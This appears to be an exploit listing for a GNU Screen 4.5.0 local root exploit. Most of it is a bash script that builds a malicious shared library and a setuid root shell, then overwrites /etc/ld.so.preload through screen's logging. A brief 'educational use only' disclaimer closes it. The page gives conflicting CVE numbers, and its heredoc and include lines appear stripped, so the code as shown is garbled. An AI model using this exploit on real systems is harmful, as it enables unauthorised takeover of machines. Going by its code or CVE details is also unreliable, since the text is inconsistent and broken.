Share
## https://sploitus.com/exploit?id=529A5B48-ADAA-59FD-A3CB-3285883859D1
### GNU Screen 4.5.0 Local Privilege Escalation Exploit (CVE-2017-5618)

## ๐Ÿ“Œ Overview
Local privilege escalation exploit for GNU Screen 4.5.0 that hijacks shared library loading to gain **root access** via `ld.so.preload` manipulation.


## ๐Ÿ”ง Technical Details

Vulnerability: CVE-2017-5618

Type: Shared Library Hijacking via ld.so.preload

Affected: GNU Screen 4.5.0 exclusively

Fixed in: GNU Screen 4.6.0+



## ๐ŸŽช The Vulnerability Circus


CVE: 2017-5618 ๐ŸŽฏ

***The Bug: Screen 4.5.0 creates log files with DANGEROUS permissions***

***The Magic: We trick it into creating /etc/ld.so.preload that loads our malicious library***

***The Payload: Instant root shell! ๐Ÿš***



## Script ๐Ÿ—’๏ธ

```bash
#!/bin/bash
# exploit.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# CVE-2016-8781
# tested on debian jessie (8.6) with screen 4.5.
# 0xHackers - Darke
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat  /tmp/libhax.c
#include 
#include 
#include 
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat  /tmp/rootshell.c
#include 
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" 
echo "[+] Triggering..."
screen -ls 
/tmp/rootshell
            
```
## Screenshots

> Checking Vulnerable Screen Version.

![Screen version detected](images/screen.png)


> Creating The File And Giving Required Permissions.

![Making](images/making.png)


> Root Access Gained.

![Root](images/root.png)

> Root shell achieved - full system control

## โš ๏ธ Warning Label


FOR EDUCATIONAL USE ONLY! โš ๏ธ
Don't be a script kiddie - use this only on systems you own or have explicit permission to test.

## Tested On
 TryHackMe KOTH Room - Food